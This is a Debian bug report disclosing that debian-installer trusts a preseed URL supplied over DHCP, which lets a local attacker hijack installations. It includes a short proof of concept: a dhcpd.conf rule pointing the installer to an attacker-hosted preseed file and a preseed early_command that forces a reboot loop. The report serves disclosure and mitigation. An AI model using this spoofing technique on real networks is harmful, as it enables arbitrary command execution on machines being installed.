Bug#788634: debian-installer: Accepting a preseed URL from DHCP allows attacker to hijack installation
Package: debian-installer
Severity: important
Tags: d-i, security
Dear Maintainer,
I emailed the following to debian-security and was advised to open a public bug for it.
Debian-installer will accept a preseed URL provided via a DHCP option, even when installed from CD-ROM. No authentication of this parameter can be performed, and the user is not prompted before it is accepted due to the nature of preseeding. Due to this, an attacker on the local network can spoof a DHCP responce pointing to their own preseed file, which can do all sorts of mischief (such as adding users or executing commands).
An example:
in dhcpd.conf:
if substring(option vendor-class-identifier, 0, 3 = "d-i" { filename "http://192.168.1.1/preseed.txt"; }
and in /var/www/preseed.txt:
d-i preseed/early_command string reboot
which will send the client into a reboot loop.
I'm not sure of the best way to mitigate this, without annoying people who use this feature. Perhaps a kernel commandline arg to specifically enable preseed via DHCP is a good idea? I understand that one expected use case is for an administrator to specify an apt mirror via DHCP preseed, so that even users installing from their own CD/DVD will pick it up, which would break in this scenario.
-- System Information:
Debian Release: wheezy/sid
APT prefers precise-updates
APT policy: (500, 'precise-updates'), (500, 'precise-security'), (500, 'precise'), (100, 'precise-backports')
Architecture: amd64 (x86_64)
Kernel: Linux 3.11.0-15-generic (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Reply to: